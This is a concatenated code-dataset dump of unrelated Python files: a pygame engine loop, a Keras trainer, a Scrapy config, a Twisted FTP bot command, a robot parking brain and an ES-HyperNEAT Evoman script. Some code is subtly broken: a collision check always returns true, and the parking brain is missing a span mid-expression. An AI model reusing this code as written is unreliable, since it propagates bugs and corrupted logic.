for an event, and call it if it does.\n \"\"\"\n if hasattr(instance, event):\n return getattr(instance, event)(*args, **kwargs)\n \ndef check_possible_collision(first, second, blueprints):\n \"\"\"\n Checks if ``second`` is in ``first.possible_collisions``, or vice versa.\n \"\"\"\n return (type(first), type(second) in blueprints.possible_collisions)\n\n \ndef key_method_args(key):\n \"\"\"\n Return the method name used by blueprints to refer to a Pygame key event, and possibly arguments to be passed to a relevant Blueprint instance's event.\n \"\"\"\n if key in constants.key_constants1:\n return KeyEventWithoutData(constants.key_constants1[key])\n else:\n for group in constants.key_constants2:\n if key in group:\n method_name = constants.key_constants2[group]\n if method_name == \"key_letter\":\n return KeyEventWithData(method_name, chr(key))\n elif method_name == \"key_numberpad\":\n return KeyEventWithData(method_name, key-256) # pygame.K_KPx -> x\n elif method_name == \"key_number\":\n return KeyEventWithData(method_name, key-48) # pygame.K_x -> x\n elif method_name == \"key_function\":\n return KeyEventWithData(method_name, key-281) # pygame.K_Fx -> x\n else:\n return KeyEventWithoutData(method_name)\n else:\n return KeyEventWithData(\"key_unknown\")\n\ndef call_key_method(instance, method, suffix):\n \"\"\"\n Calls a key related method on an instance.\n \"\"\"\n if type(method) == KeyEventWithoutData:\n try_event(instance, method.name + suffix)\n elif type(method) == KeyEventWithData:\n try_event(instance, method.name + suffix, method.data)\n\n \ndef get_active_things(views, thing_grid):\n return list(set.union(*[thing_grid.select_region(v.x, v.y, v.width, v.height) for v in views])) \n \ndef sort_stuff(active_instances, active_scenery):\n return sorted(active_instances + active_scenery, key=attrgetter(\"draw_depth\"))\n \ndef main(events, views, objects, scenery, settings, blueprints, 
level):\n \"\"\"\n Set up the game and run the game loop.\n \"\"\"\n pygame.init()\n \n events, doubletap_events = events\n \n cpcs = check_possible_collision # local variable for speed\n \n game_name = settings.game_name\n game_version = settings.game_version\n window_caption = \"{} - {}\".format(game_name, game_version)\n window_width = settings.window_width\n window_height = settings.window_height\n game_speed = settings.game_speed\n active_count = settings.active_count\n\n window = pygame.display.set_mode((window_width, window_height))\n pygame.display.set_caption(window_caption)\n\n game_clock = pygame.time.Clock()\n \n key_held_events = set()\n key_doubletap_possibles = set()\n \n objects_grid = classes.Grid(objects, level.width, level.height, settings.sector_size)\n classes.Blueprint.grid = objects_grid\n \n scenery_grid = classes.Grid(scenery, level.width, level.height, settings.sector_size)\n classes.Scenery.grid = scenery_grid\n \n counter = 0\n \n while True:\n key_doubletap_events = set()\n key_press_events = set()\n key_release_events = set()\n \n mouse_events = set()\n \n mouse_x, mouse_y = pygame.mouse.get_pos()\n mouse_x += views[0].x\n mouse_y += views[0].y\n blueprints.variables.mouse_x, blueprints.variables.mouse_y = mouse_x, mouse_y\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.KEYUP:\n method = key_method_args(event.key)\n if method.name + \"_release\" in events:\n key_release_events.add(method)\n key_held_events.discard(method)\n elif event.type == pygame.KEYDOWN:\n method = key_method_args(event.key)\n if method.name + \"_press\" in events:\n key_press_events.add(method)\n if method.name + \"_held\" in events:\n key_held_events.add(method)\n if method.name + \"_doubletap\" in doubletap_events:\n t = time()\n for e in key_doubletap_possibles:\n if t - e.time <= 0.3: # if it was less than 0.3 seconds ago\n key_doubletap_events.add(e.key_event)\n key_doubletap_possibles.discard(e)\n break\n else:\n key_doubletap_possibles.add(DoubleTapEvent(method, time()))\n \n for v in views:\n v.update_variables()\n \n counter -= 1\n if counter <= 0:\n active_instances = get_active_things(views, objects_grid)\n active_scenery = get_active_things(views, scenery_grid)\n counter = active_count\n\n things_to_draw = sort_stuff(active_instances, active_scenery)\n draw_objects(things_to_draw, views, window)\n \n blueprints.variables.views = views\n \n for instance in active_instances:\n instance.tick()\n for method in key_press_events:\n call_key_method(instance, method, \"_press\")\n for method in key_release_events:\n call_key_method(instance, method, \"_release\")\n for method in key_held_events:\n call_key_method(instance, method, \"_held\")\n for method in key_doubletap_events:\n call_key_method(instance, method, \"_doubletap\")\n \n collision_list = sorted(active_instances, key=attrgetter(\"x\"))\n for index, instance in enumerate(collision_list):\n temp_x = instance.x # avoid constant attrgetting\n bbw = instance.bounding_box_width\n for second_instance in collision_list[index+1:]:\n if temp_x + bbw < second_instance.x:\n break\n elif cpcs(instance, second_instance, blueprints) and instance.get_rect().colliderect(second_instance.get_rect()):\n try_event(instance, \"collide\", second_instance)\n try_event(second_instance, \"collide\", instance)\n \n for instance in active_instances:\n instance.end_tick() \n \n views = blueprints.variables.views\n \n # set the caption\n if game_version.build_type != \"r\": 
# r for release\n window_caption = \"{} - {} - {} fps\".format(game_name, game_version, game_clock.get_fps())\n pygame.display.set_caption(window_caption)\n \n pygame.display.flip() \n \n game_clock.tick(game_speed)","sub_path":"gamebaker/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":10327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"553412601","text":"\nfrom base.base_trainer import BaseTrain\nimport sys, os, psutil, math\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping\nimport collections # for flatten() TODO: make a utility libr for flatten, etc.\n\ndef flatten(d, parent_key='', sep='_'):\n items = []\n for k, v in d.items():\n new_key = parent_key + sep + k if parent_key else k\n if isinstance(v, collections.MutableMapping):\n items.extend(flatten(v, new_key, sep=sep).items())\n else:\n items.append((new_key, v))\n return dict(items)\n\nclass SimpleMnistModelTrainerWGenerator(BaseTrain):\n def __init__(self, model, train_generator, config, valid_data=None):\n super(SimpleMnistModelTrainerWGenerator, self).__init__(model,\n train_generator, config, valid_data)\n # self.train_generator = train_generator\n # self.validation_generator = valid_data\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.init_callbacks()\n\n\n\n def init_callbacks(self):\n # TODO: figure out LearningRateScheduler callback with polydecay maybe\n # TODO: early stopping callback\n self.callbacks.append(\n ModelCheckpoint(\n filepath=os.path.join(self.config.callbacks.checkpoint_dir,\n '%s-{epoch:02d}-{val_loss:.2f}.hdf5' % self.config.exp.name),\n monitor=self.config.callbacks.checkpoint_monitor,\n mode=self.config.callbacks.checkpoint_mode,\n save_best_only=self.config.callbacks.checkpoint_save_best_only,\n save_weights_only=self.config.callbacks.checkpoint_save_weights_only,\n verbose=self.config.callbacks.checkpoint_verbose,\n )\n )\n\n self.callbacks.append(\n TensorBoard(\n log_dir=self.config.callbacks.tensorboard_log_dir,\n write_graph=self.config.callbacks.tensorboard_write_graph,\n )\n )\n\n self.callbacks.append(\n EarlyStopping(\n monitor=self.config.callbacks.early_stopping_monitor,\n min_delta=self.config.callbacks.early_stopping_min_delta,\n patience=self.config.callbacks.early_stopping_patience,\n verbose=self.config.callbacks.early_stopping_patience\n )\n )\n\n # if the config has the debug flag on, turn on tfdbg (TODO: make it work)\n if hasattr(self.config,\"debug\"):\n if (self.config.debug == True):\n import keras.backend\n from tensorflow.python import debug as tf_debug\n print(\"#=========== DEBUG MODE ===========#\")\n sess = keras.backend.get_session()\n sess = tf_debug.LocalCLIDebugWrapperSession(sess)\n keras.backend.set_session(sess)\n\n # if the config file has a comet_ml key, log on comet\n if hasattr(self.config,\"comet_api_key\"):\n #from comet_ml import Experiment # PUT the import in main\n #experiment = Experiment(api_key=self.config.exp.comet_api_key,\n # project_name=self.config.exp.name)\n #experiment.disable_mp()\n self.config.exp_handle.log_multiple_params(flatten(self.config.toDict()))\n self.callbacks.append(self.config.exp_handle.get_keras_callback())\n\n def train(self):\n\n # TODO: fix this it's now here just for future sanity\n # (somehow split the incoming data?)\n if (self.valid_data==None):\n print(\"\"\"Need some validation data or the\n ModelCheckpoint won't be saved\"\"\")\n return\n\n history = 
self.model.fit_generator(\n generator=self.data,\n epochs=self.config.trainer.num_epochs,\n # steps_per_epoch=int(math.ceil(34564/float(self.config.trainer.batch_size))),\n # 34564 math.ceil(len(os.listdir(self.config.data_loader.train_dir))\\\n # / float(self.config.trainer.batch_size)), # WILL USE __len__() if left\n verbose=self.config.trainer.verbose_training,\n validation_data=self.valid_data,\n # validation_steps=int(math.ceil(8640/float(self.config.trainer.batch_size))),\n # math.ceil(len(os.listdir(self.config.data_loader.test_dir))\\\n # / float(self.config.trainer.batch_size)),\n callbacks=self.callbacks,\n use_multiprocessing=True,\n workers=psutil.cpu_count(),\n # max_queue_size=20,\n shuffle=True\n )\n\n self.loss.extend(history.history['loss'])\n self.acc.extend(history.history['acc'])\n self.val_loss.extend(history.history['val_loss'])\n self.val_acc.extend(history.history['val_acc'])\n","sub_path":"trainers/simple_mnist_trainer_w_generator.py","file_name":"simple_mnist_trainer_w_generator.py","file_ext":"py","file_size_in_byte":4826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"52769143","text":"from torch import randn\nfrom torch.nn import MaxPool2d\n\nfrom backpack import extend\n\n\ndef data(device=\"cpu\"):\n N, C, Hin, Win = 100, 10, 32, 32\n KernelSize = 4\n\n X = randn(N, C, Hin, Win, requires_grad=True, device=device)\n module = extend(MaxPool2d(KernelSize)).to(device=device)\n out = module(X)\n\n Hout = int(Hin / KernelSize)\n Wout = int(Win / KernelSize)\n vout = randn(N, C, Hin, Win, device=device)\n vin = randn(N, C, Hout, Wout, device=device)\n\n return {\n \"X\": X,\n \"module\": module,\n \"output\": out,\n \"vout_ag\": vout,\n \"vout_bp\": vout.view(N, -1, 1),\n \"vin_ag\": vin,\n \"vin_bp\": vin.view(N, -1, 1),\n }\n","sub_path":"test/benchmark/jvp_maxpool2d.py","file_name":"jvp_maxpool2d.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"42877469","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\nimport zerorpc\nfrom jiebarpc.dispatcher import JiebaRPCDispatcher\n\n\nclass JiebaRPCServer(zerorpc.Server):\n def __init__(self, methods=None, *args, **kwargs):\n methods = methods or JiebaRPCDispatcher()\n super(JiebaRPCServer, self).__init__(\n methods,\n *args,\n **kwargs\n )\n\n\nif __name__ == '__main__':\n server = JiebaRPCServer()\n server.bind('tcp://0.0.0.0:4242')\n server.run()\n","sub_path":"jiebarpc/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"534865240","text":"# -*- coding: utf-8 -*-\nimport os\n\n# Scrapy settings for nhs project\n#\n# For simplicity, this file contains only settings considered important or\n# commonly used. 
You can find more settings consulting the documentation:\n#\n# https://doc.scrapy.org/en/latest/topics/settings.html\n# https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\nBOT_NAME = 'nhs'\n\nSPIDER_MODULES = ['nhs.spiders']\nNEWSPIDER_MODULE = 'nhs.spiders'\n\n\n# Crawl responsibly by identifying yourself (and your website) on the user-agent\n# USER_AGENT = 'nhs (+http://www.yourdomain.com)'\n\n# Obey robots.txt rules\nROBOTSTXT_OBEY = True\n\n# Configure maximum concurrent requests performed by Scrapy (default: 16)\n#CONCURRENT_REQUESTS = 32\n\n# Configure a delay for requests for the same website (default: 0)\n# See https://doc.scrapy.org/en/latest/topics/settings.html#download-delay\n# See also autothrottle settings and docs\n# DOWNLOAD_DELAY = 3\n# The download delay setting will honor only one of:\n# CONCURRENT_REQUESTS_PER_DOMAIN = 16\n# CONCURRENT_REQUESTS_PER_IP = 16\n\n# Disable cookies (enabled by default)\n# COOKIES_ENABLED = False\n\n# Disable Telnet Console (enabled by default)\n# TELNETCONSOLE_ENABLED = False\n\n# Override the default request headers:\n# DEFAULT_REQUEST_HEADERS = {\n# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n# 'Accept-Language': 'en',\n# }\n\n# Enable or disable spider middlewares\n# See https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n# SPIDER_MIDDLEWARES = {\n# 'nhs.middlewares.NhsSpiderMiddleware': 543,\n# }\n\n# Enable or disable downloader middlewares\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html\n# DOWNLOADER_MIDDLEWARES = {\n# 'nhs.middlewares.NhsDownloaderMiddleware': 543,\n# }\n\n# Enable or disable extensions\n# See https://doc.scrapy.org/en/latest/topics/extensions.html\n# EXTENSIONS = {\n# 'scrapy.extensions.telnet.TelnetConsole': None,\n# }\n\n# Configure item pipelines\n# See https://doc.scrapy.org/en/latest/topics/item-pipeline.html\nITEM_PIPELINES = {\n 'scrapy.pipelines.files.FilesPipeline': 10,\n# 'nhs.pipelines.MongoPipeline': 20,\n 'nhs.pipelines.KafkaPipeline': 15\n # 'nhs.pipelines.DoNothingPipeline': 1,\n}\n\nFILES_STORE = os.environ.get('FILES_STORE', '/home/pjmd/tmp/nhs/files')\n\n# Enable and configure the AutoThrottle extension (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/autothrottle.html\n# AUTOTHROTTLE_ENABLED = True\n# The initial download delay\n# AUTOTHROTTLE_START_DELAY = 5\n# The maximum download delay to be set in case of high latencies\n# AUTOTHROTTLE_MAX_DELAY = 60\n# The average number of requests Scrapy should be sending in parallel to\n# each remote server\n# AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0\n# Enable showing throttling stats for every response received:\n# AUTOTHROTTLE_DEBUG = False\n\n# Enable and configure HTTP caching (disabled by default)\n# See https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings\n# HTTPCACHE_ENABLED = True\n# HTTPCACHE_EXPIRATION_SECS = 0\n# HTTPCACHE_DIR = 'httpcache'\n# HTTPCACHE_IGNORE_HTTP_CODES = []\n# HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'\n\n# MONGO\nMONGO_URI = os.environ.get('MONGO_URI', 'mongodb://127.0.0.1:27017/')\nMONGO_DATABASE = 'nhsdb'\nVALIDATE = False\n# KAFKA\nKAFKA_HOST = os.environ.get('KAFKA_HOST', 'localhost')\nKAFKA_PORT = os.environ.get('KAFKA_PORT', 9092)\nTOPIC = 'scrapypipe'\nBULK_SEND = True if os.environ.get('BULK_SEND', 'False').lower() in ['true', 'yes'] else False\nBULK_SIZE = 
os.environ.get('BULK_SIZE', 100)\n# VALIDATION_SCHEMA = {\n# 'validator': {\n# '$jsonSchema': {\n# 'bsonType': \"object\",\n# 'required': [ \"category\", \"Formulations\", \"Medicine\", \"unit\", \"period\", \"Pack_Size\", \"VMPP_Snomed_Code\", \"Basic_Price\" ],\n# 'properties': {\n# 'Medicine': {\n# 'bsonType': \"string\",\n# 'description': \"must be a string and is required\"\n# },\n# 'Basic_Price': {\n# 'bsonType': \"float\",\n# 'description': \"must be a float and is required\"\n# }\n# }\n# }\n# }\n# }\nVALIDATION_SCHEMA = {\n 'validator': {\n '$jsonSchema': [\n {'bsonType': \"object\"},\n {'required': [\"category\", \"Formulations\", \"Medicine\", \"unit\", \"period\", \"Pack_Size\", \"VMPP_Snomed_Code\",\n \"Basic_Price\"]},\n {'properties': {\n 'Medicine': [\n ('bsonType', \"string\"),\n ('description', \"must be a string and is required\")\n ],\n 'Basic_Price': [\n ('bsonType', \"float\"),\n ('description', \"must be a float and is required\")\n ]\n }\n }\n ]\n }\n}\n","sub_path":"nhs/nhs/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"436744377","text":"from twisted.internet import reactor\nfrom twisted.internet.defer import inlineCallbacks\nfrom twisted.internet.protocol import ClientCreator\nfrom twisted.protocols.ftp import FTPClient, FTPFileListProtocol\nfrom lib.utils import cache\nimport fnmatch, os\n\nconfig = {\n \"access\": \"admin\",\n \"help\": \".cache [filter] [showname] || .cache premux eotena || Caches the premux for a show so that .chapters, .xdelta and .release work faster\",\n \"reversible\": False\n}\n\n@inlineCallbacks\ndef command(self, user, channel, msg):\n if len(msg) < 2:\n self.msg(channel, \"Need a filter and show name\")\n return\n name_filter, show = msg[0], \" \".join(msg[1:])\n show = self.factory.resolve(show, channel)\n if show is None:\n return\n if not show[\"folder\"]:\n self.msg(channel, \"No FTP folder given for {}\".format(show[\"series\"]))\n return\n episode = show[\"current_ep\"] + 1\n\n ftp = yield ClientCreator(reactor, FTPClient, self.factory.config.ftp_user, self.factory.config.ftp_pass).connectTCP(self.factory.config.ftp_host, self.factory.config.ftp_port)\n ftp.changeDirectory(\"/{}/{:02d}/\".format(show[\"folder\"], episode))\n filelist = FTPFileListProtocol()\n yield ftp.list(\".\", filelist)\n files = [x[\"filename\"] for x in filelist.files if x[\"filetype\"] != \"d\"]\n premux = fnmatch.filter(files, \"*{}*.mkv\".format(name_filter))\n\n if not premux:\n self.msg(channel, \"No premux found\")\n return\n elif len(premux) > 1:\n self.msg(channel, \"Too many premux files match the filter: {}\".format(\", \".join(premux)))\n return\n else:\n premux = premux[0]\n premux_len = [x[\"size\"] for x in filelist.files if x[\"filename\"] == premux][0]\n\n\n if os.path.isfile(\"{}/{}\".format(self.factory.config.premux_dir, premux)):\n self.msg(channel, \"{} already is cached. 
Message fugi if you need it re-cached.\".format(premux))\n return\n\n success = yield cache(self, user, ftp, premux, premux_len)\n\n if success:\n self.msg(channel, \"{} cached.\".format(premux))\n else:\n self.msg(channel, \"Caching of {} failed.\".format(premux))\n\n yield ftp.quit()\n ftp.fail(None)\n","sub_path":"commands/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"236624582","text":"from collections import deque\ntc = int(input())\nfor t in range(tc):\n N, K = map(int,input().split())\n l1 = list(input())\n bar = N//4\n vktodehlstn = []\n\n for i in range(bar+1):\n if i == 0:\n for j in range(4):\n b = \"\".join(l1[ bar*j : j*bar+bar ])\n vktodehlstn.append(b)\n else:\n a = l1.pop()\n l1.insert(0,a)\n for j in range(4):\n b = \"\".join(l1[ bar*j : j*bar+bar ])\n vktodehlstn.append(b)\n\n\n vktodehlstn = list(set(vktodehlstn))\n vktodehlstn.sort(reverse=True)\n X = \"0x\" + vktodehlstn[K-1]\n h = int(X, 16)\n print(\"#\",t+1,' ',h, sep='')\n \n ","sub_path":"SWEA/SWEA_5658.py","file_name":"SWEA_5658.py","file_ext":"py","file_size_in_byte":699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"223437670","text":"import sys\nimport math\nimport os.path\n\nfrom soar.robot.pioneer import PioneerRobot\nfrom soar.hooks import tkinter_hook, is_gui, sim_completed\nfrom soar.gui.plot_window import PlotWindow\nfrom soar.sim.geometry import normalize_angle_180\nfrom soar.client import brain_path\nimport lib601.markov as markov\nfrom lib601.dist import *\n\nimport beliefGraph\nimport idealReadings\n\n####################################################################\n###\n### Preliminaries -- do not change the following code\n###\n####################################################################\n\nrobot = PioneerRobot()\n\nlab_path = os.path.dirname(brain_path)\nWORLD_FILE = os.path.join(lab_path,'baseWorld.py')\nFORWARD_VELOCITY = 0.2 # meters / second\nTIMESTEP_LENGTH = 0.1 # seconds\n\n\n# Where the robot will be in the world\n(x_min, x_max) = (0, 6.08)\nrobotY = y = 0.5\n\n# Distance and Gain for Wall Following\ndesired_right = 0.5\nKp,Ka = (10.0,2.)\n\n# Maximum \"good\" sonar reading\nsonar_max = 1.5\n\n#method to discretize values into boxes of size grid_size\ndef discretize(value, grid_size, max_bin=float('inf'), value_min = 0):\n return min(int(((value or sonar_max) - value_min)/grid_size), max_bin)\n\n#method to clip x to be within lo and hi limits, inclusive\ndef clip(x, lo, hi):\n return max(lo, min(x, hi))\n\n####################################################################\n###\n### Probabilistic Models -- you may change this code\n###\n####################################################################\n\n# Number of discrete locations and discrete observations\nnum_states = 40\nnum_observations = 12\n\n# compatibility for some students who got the old names\nnumStates = num_states\nnumObservations = num_observations\nimport lib601.dist as dist\n\n\ndef obs_model(s):\n tilt = triangle_dist(ideal[s],num_observations//6, 0, num_observations-1)\n wall = uniform_dist(range(num_observations))\n p = .95\n final_dist = mixture(tilt, wall, p)\n return final_dist\n\ndef trans_model(s):\n delta_pos = FORWARD_VELOCITY * robot.direction * TIMESTEP_LENGTH\n width = (x_max - x_min)/(num_states-1)\n delta = delta_pos/width\n p = abs(delta - int(delta))\n if s+int(delta) >= num_states-1:\n new_dist = 
{num_states-1:1}\n## elif s+int(delta) <= 0:\n## new_dist = {0:1}\n elif robot.direction == 1: \n new_dist = {clip(s+int(delta), 0, num_states-1):1-p, clip(s+int(delta)+1, 0, num_states-1):p}\n elif robot.direction == -1:\n new_dist = {clip(s+int(delta), 0, num_states-1):1-p, clip(s+int(delta)-1, 0, num_states-1):p}\n \n return DDist(new_dist)\n\n\ndef confident_location(belief):\n s_true = belief.max_prob_elt()\n width = (x_max - x_min)/(num_states-1)\n state_range = int((0.45/2)// width)\n sum_prob = 0\n for i in range(s_true-state_range, state_range+s_true):\n sum_prob += belief.prob(i)\n if sum_prob > 0.75:\n return (s_true, True)\n return (-1, False) \n\n\nuniform_init_dist = square_dist(0, num_states)\n\nREAL_ROBOT = True\n\n######################################################################\n###\n### Brain Methods -- do not change the following code\n###\n######################################################################\n\n# Robot's Ideal Readings\n#ideal = idealReadings.compute_ideal_readings(WORLD_FILE, x_min, x_max, robotY, num_states, num_observations)\nideal = [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5]\n\ndef get_parking_spot(ideal):\n avg = sum(ideal)/float(len(ideal))\n i = len(ideal)-1\n print('len(idea)', len(ideal))\n print('avg = ', avg)\n while i>0 and ideal[i]>avg:\n i -= 1\n print('i=', i)\n j = i\n while j>0 and ideal[j] avg and i > 0 and ideal[i-1] < avg:\n in_room = i\n if ideal[i] < avg and ideal[i-1] > avg and i > 0:\n out_room = i\n count_rooms += 1\n if count_rooms == table:\n return (in_room + out_room-1)/2\n return (in_room + out_room -1)/2\n \ndef on_step(step_duration):\n sonars = robot.sonars\n (px, py, ptheta) = robot.pose\n width = (x_max - x_min)/(num_states-1)\n if robot.confident:\n print('x: ', robot.pose.x)\n (location, _) = confident_location(robot.estimator.belief)\n print('Im parking')\n table_state = get_desired_table_state(ideal, robot.table)\n table_location = table_state * width + x_min\n robot.direction = (table_state - location)/abs(table_state - location)\n (distance_right, theta) = robot.get_distance_right_and_angle()\n if not theta:\n theta = 0\n e = (desired_right-distance_right)*robot.direction\n ROTATIONAL_VELOCITY = Kp*e - Ka*theta\n if abs(table_location - robot.pose.x) > width*.1 and robot.back_ward:\n robot.fv = FORWARD_VELOCITY * robot.direction\n robot.rv = ROTATIONAL_VELOCITY #* robot.direction\n elif abs(table_location - robot.pose.x) < width*.1 and robot.back_ward:\n robot.fv = 0\n robot.back_ward = False\n robot.rotate = True\n if robot.rotate: \n if abs(robot.pose[2] - 3.14/2) > .09:\n #robot.rv = 0.2 * (robot.pose[2] - 90)\n robot.rv = .2\n else:\n robot.rotate = False\n robot.park = True\n if robot.park:\n if sonars[4] > .2:\n robot.fv = .2\n robot.rv = 0 \n else:\n robot.fv = 0\n robot.rv = 0\n print('I parked')\n return\n\n \n # Quality metric. 
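This is the probability mass the belief assigns to the parking margin around the true pose (see estimate_quality_measure below). 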
Important to do this before we update the belief state, because\n # it is always a prediction\n if not REAL_ROBOT:\n parkingSpaceSize = .75\n robotWidth = 0.3\n margin = (parkingSpaceSize - robotWidth) / 2\n robot.probMeasures.append(estimate_quality_measure(robot.estimator.belief,\n x_min, x_max, num_states, margin, px))\n true_state = discretize(px, (x_max - x_min)/num_states, value_min = x_min)\n true_state = clip(true_state, 0, num_states-1)\n n = len(robot.probMeasures)\n\n # current discretized sonar reading\n left = discretize(sonars[0], sonar_max/num_observations, num_observations-1)\n if not REAL_ROBOT:\n robot.data.append((true_state, ideal[true_state], left))\n # obsProb\n obsProb = sum([robot.estimator.belief.prob(s) * obs_model(s).prob(left)\n for s in range(num_states)])\n\n # GRAPHICS\n if robot.g is not None:\n # draw robot's true state\n if not REAL_ROBOT:\n if true_state < num_states:\n robot.g.updateDist()\n robot.g.updateTrueRobot(true_state)\n # update observation model graph\n robot.g.updateObsLabel(left)\n robot.g.updateObsGraph([obs_model(s).prob(left)\n for s in range(num_states)])\n\n robot.estimator.update(left)\n (location, robot.confident) = confident_location(robot.estimator.belief)\n \n # GRAPHICS\n if robot.g is not None:\n # update world drawing\n # update belief graph\n robot.g.updateBeliefGraph([robot.estimator.belief.prob(s)\n for s in range(num_states)])\n # DL3 Angle Controller\n (distance_right, theta) = robot.get_distance_right_and_angle()\n if not theta:\n theta = 0\n e = desired_right-distance_right\n ROTATIONAL_VELOCITY = Kp*e - Ka*theta\n robot.fv = FORWARD_VELOCITY * robot.direction\n robot.rv = ROTATIONAL_VELOCITY \n## robot.rv = 1\ndef on_shutdown():\n pass\n\ndef estimate_quality_measure(belief, x_min, x_max, num_states, delta, true_x):\n min_good = max(true_x - delta, x_min)\n max_good = min(true_x + delta, x_max)\n state_size = (x_max - x_min) / num_states\n min_good_discrete = max(0, discretize(min_good, state_size, value_min = x_min))\n max_good_discrete = min(num_states-1,\n discretize(max_good, state_size, value_min = x_min)) + 1\n\n min_good_reconstituted = min_good_discrete * state_size + x_min\n max_good_reconstituted = max_good_discrete * state_size + x_min\n\n frac_low_bin_in_range = 1 - ((min_good - min_good_reconstituted) / state_size)\n frac_high_bin_in_range = 1 - ((max_good_reconstituted - max_good) / state_size)\n\n total = sum(belief.prob(s) for s in range(min_good_discrete+1, max_good_discrete))\n lowP = belief.prob(min_good_discrete) * frac_low_bin_in_range\n highP = belief.prob(max_good_discrete) * frac_high_bin_in_range\n return total + lowP + highP\n","sub_path":"src/old_files/parkingBrain_park.py","file_name":"parkingBrain_park.py","file_ext":"py","file_size_in_byte":10107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"273194460","text":"import neat \nimport neat.nn\ntry:\n import cPickle as pickle\nexcept:\n import pickle\nimport sys,os\nsys.path.append('../pureples/')\nfrom pureples.shared.substrate import Substrate\nfrom pureples.shared.visualize import draw_net,draw_es\nfrom pureples.es_hyperneat.es_hyperneat import ESNetwork\nimport numpy as np\nimport statistics\nsys.path.insert(0, 'evoman')\nfrom environment import Environment\n\nfrom tqdm import tqdm\nfrom neat_feed_forward_controller import player_controller\nenemy = str(sys.argv[1]) if len(sys.argv)> 1 else 6 \n\ndef eval_fitness(genomes, config):\n sum = 0\n max = -9999999\n c = 0\n global max_f\n 
global max_g\n \n fs = []\n for idx, genome in tqdm(genomes):\n \n cppn = neat.nn.FeedForwardNetwork.create(genome, config)\n # plot = draw_net(cppn, filename=experiment_name+\"/es_hyperneat_xor_medium_cppn\")\n # plot.view()\n network = ESNetwork(sub, cppn, params)\n # if c %10 ==0:\n\n # net = network.create_phenotype_network(filename=experiment_name+'/substrate.jpg')\n # else:\n net = network.create_phenotype_network()\n \n # draw_es(id_to_coords, network.connections, experiment_name+'/substrate')\n env.player_controller =player_controller( net)\n c +=1\n f,p,e,t = env.play(pcont=genome)\n if f > max_f:\n max_f = f\n max_g = genome\n\n genome.fitness = f\n fs.append(f)\n sum += f\n # exit()\n if f>max:\n max_g = genome\n max = f\n mean = np.sum(fs) / c\n std = statistics.stdev(fs)\n with open(experiment_name+'/'+'my_log.txt','a') as f:\n f.write('mean,'+str(mean)+',max,'+str(max)+',std,'+str(std)+'\\r')\n# Create the population and run the XOR task by providing the above fitness function.\ndef run(gens):\n pop = neat.population.Population(config)\n stats = neat.statistics.StatisticsReporter()\n pop.add_reporter(stats)\n pop.add_reporter(neat.reporting.StdOutReporter(True))\n\n winner = pop.run(eval_fitness, gens)\n # print(\"es_hyperneat_xor_medium done\")\n return winner, stats\n\n\n# If run as script.\nif __name__ == '__main__':\n headless = True\n if headless:\n os.environ[\"SDL_VIDEODRIVER\"] = \"dummy\"\n input_coordinates = [(-3.0 , 4.0),(-3.0 , 3.0),(-3.0 , 2.0),(-3.0 , 1.0),\n (-3.0 , -1.0),(-3.0 , -2.0),(-3.0 , -3.0),(-3.0 , -4.0),\n (3.0 , 4.0),(3.0 , 3.0),(3.0 , 2.0),(3.0 , 1.0),\n (3.0 , -1.0),(3.0 , -2.0),(3.0 , -3.0),(3.0 , -4.0),\n (0.0 , 4.0),(0.0 , 2.0),(0.0 , -4.0),(0.0 , -2.0)]\n\n output_coordinates = [(-2.0, 5.0),(-1.0, 5.0),(0.0, 5.0),(1.0, 5.0),(2.0, 5.0),]\n\n for i in range(10):\n \n experiment_name = 'hyper_enemy'+ str(enemy)+'multi'+str(i)\n if not os.path.exists(experiment_name):\n os.makedirs(experiment_name)\n env = Environment(experiment_name=experiment_name,\n enemies=[enemy],\n playermode=\"ai\",\n player_controller=player_controller,\n enemymode=\"static\",\n level=2,\n speed=\"fastest\",\n randomini=\"yes\" )\n global max_f \n max_f = -9999\n global max_g \n max_g = None\n sub = Substrate(input_coordinates, output_coordinates)\n\n # ES-HyperNEAT specific parameters.\n params = {\"initial_depth\": 1,\n \"max_depth\": 2,\n \"variance_threshold\": 0.03,\n \"band_threshold\": 0.3,\n \"iteration_level\": 1,\n \"division_threshold\": 0.5,\n \"max_weight\": 8.0,\n \"activation\": \"sigmoid\"}\n\n # Config for CPPN.\n config = neat.config.Config(neat.genome.DefaultGenome, neat.reproduction.DefaultReproduction,\n neat.species.DefaultSpeciesSet, 